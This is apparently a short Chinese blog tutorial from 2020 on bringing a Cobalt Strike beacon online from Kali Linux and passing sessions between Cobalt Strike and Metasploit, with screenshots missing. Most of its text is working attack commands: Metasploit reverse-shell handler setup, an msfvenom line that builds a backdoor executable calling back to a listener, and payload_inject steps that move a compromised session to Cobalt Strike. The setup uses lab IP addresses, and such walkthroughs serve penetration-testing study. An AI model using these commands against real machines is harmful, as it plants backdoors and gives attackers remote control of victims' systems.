cs上線

expyoyo發表於2020-10-21

CS上線

下載好CS檔案。
在這裡插入圖片描述
我搭建在kali上面將teamserver加上可執行許可權。
在這裡插入圖片描述
啟動:
在這裡插入圖片描述
客戶端
在這裡插入圖片描述
在這裡插入圖片描述

設定監聽器,生成後門
在這裡插入圖片描述

點選上線。

在這裡插入圖片描述
後繼續與msf聯動
msf上操作
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.208
set lport 7777
exploit -j #-j 後臺監聽

2、CS上操作
首先有一個已經建立會話的shell,然後新增監聽器Listener,HOST和PORT填寫msf監聽的地址IP:x.x.x.x,PORT:7777
在這裡插入圖片描述
在這裡插入圖片描述
新增監視器,選擇派生會話,選中監視器。在這裡插入圖片描述
聯動成功
在這裡插入圖片描述
再msf與cs聯動
生成嗎
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=3333 -f exe -o hello.exe
kali監聽
msf5 exploit(multi/handler) > set lhost 192.168.198.180
lhost => 192.168.198.180
msf5 exploit(multi/handler) > set lport 3333
lport => 3333
msf5 exploit(multi/handler) > run
在這裡插入圖片描述
反彈成功,接下來反彈到cs
在這裡插入圖片描述
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
#設定與cs相同的payload
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.198.180
msf5 exploit(windows/local/payload_inject) > set lport 8084
#設定剛才獲得session
msf5 exploit(windows/local/payload_inject) > set session 1
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf5 exploit(windows/local/payload_inject) > run
在這裡插入圖片描述
設定走隧道,環境不好弄,算了。

相關文章